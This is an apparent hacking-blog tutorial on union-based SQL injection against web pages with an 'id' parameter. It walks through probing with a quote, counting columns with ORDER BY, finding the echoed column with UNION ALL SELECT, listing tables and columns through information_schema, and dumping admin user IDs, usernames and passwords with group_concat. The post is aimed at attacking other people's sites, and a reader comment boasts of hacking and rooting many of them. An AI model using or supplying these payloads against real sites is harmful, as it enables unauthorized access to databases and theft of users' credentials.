SQL Injection Tutorial

There are many types  of  sql injection  but in this tutorial I will  explain how you can extract  columns  ,tables containing useful data such as passwords ,user id , emails , admin pass and id ..  etc



How To Find Vulnerable  Site ?

There are many was to find vulnerable web sites finding vulnerabilities manually or using a web scanners For more you can refer  my post on  How to Find Vulnerable sites

Exploiting The Vulnerability

Now say we have found a vulnerable site add    at the end of the url and if it returns with a
Error message then the site is vulnerable

Example:-
www.vulnarable site.net/articles.php?id =1  ‘


 Now we need to find  the number of columns in current table
 For this we use “order by” commond  Add order by 1 --
 To the end of the url . Increase the numbers till we get a error message

Example:-
www.vulnarable site.net/articles.php?id =1 order by 1--


www.vulnarable site.net/articles.php?id =1  order by 2--


www.vulnarable site.net/articles.php?id =1  order by 3--

www.vulnarable site.net/articles.php?id =1  order by 4--

www.vulnarable site.net/articles.php?id =1  order by 5 --


And so on till we get a error message

Say we get a error message when we enter order by 5 --
Then number of columns in data base is 4

Now we use the “ union all select “ commond to find the vulnerable column
Add union all select + the number of columns that we found in the last step

Example:-
www.vulnarable site.net/articles.php?id =1 union all select 1,2,3,4  --

Now we should we should find some numbers popping out
Say we find one number 3 then column 3 is vulnerable


We can  find the database version, name and user. We do this by replacing the vulnerable column numbers with the following commands:
user()  , database(),version(),@@user,@@version,@@database
First thing is to find the  version of Mysql we add “@@ version “replacing the vulnerable column

Example:-
www.vulnarable site.net/articles.php?id =1  union all select 1,2,@@version ,4 --

Now we must see the version of  Msql at place where the number popped out in the previous step .If it is above 5  continue reading . If it is 4 and below then you have to brute force or guess the table and column names .

Now we need to find  all the table names in the database. To do this we use the following commands

table_name  ,information_schema.tables

Example:-
www.vulnarable site.net/articles.php?id =1 Union all select 1,2,table_name,4 from information_schema.tables --

Remember the "table_name" goes in the vulnerable column number you found earlier. If this command is entered correctly, the page should show all the tables in the database, so look for tables that may contain useful information such as admin tables or member or user tables. And so on


Now  we must find all the column names in the database, to do this we use the following command “group_concat(column_name) “,

Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(column_name) ,4 from information_schema.columns --

 Now  look for interesting names such as user name ,id ,email and password.
And so on


Finally we need to dump the data from the columns corresponding to the tables 
For this we use the following  command group_concat
 Now  say we want to get the “user id“ ,"username" and "password" fields, from table "admin"  we use group_concat command
 
Example:-
www.vulnerable site.net/articles.php?id =1 Union all select 1,2,group_concat(user id ,0x3a, username,0x3a,password),4 from admin--


If the command is successful  we must find the user id , user name , password

Example :-

1  :  admin : pass
2  :  user    : password


Most of the times the passwords are cyrpted to crack them refer my posts on Hashes and Salts


Hope you enjoyed this tutorial .If you have any doubts please be free to comment 

Subscribe to Hackaholic

Enjoyed this article?
Subscribe to "Hackaholic"and get daily
updates in your inbox for free!

Related Posts Plugin for WordPress, Blogger...

Unknown said on August 26, 2012 at 4:27 AM :

HEY bro your all posts on sqli are very nice. ! good work ! acctually i allready hacked so many sites with these methods, an i m also rooting on some of them ;)
reason to surf your website is to find some advance topic on sqli.. like..
1- post sqli tut
2- cookie based sqli.
b'coz i m mesing wid these .... also some other topics like
1-some md5 hashes are not cracked by on li9, tools takes so much time to crack..
2- common bt very irritating admin page finding,, :/ havij,perl scripts, onli9 sites fails to find admin page of some sites den wat to do... ! plz reply and ya make tut on post sqli, cookie sqli..! :p

REPLY

Use the form below to comment. No spam please!!!

© 101hacker | Design by Mukund edited by John
Powered by Blogger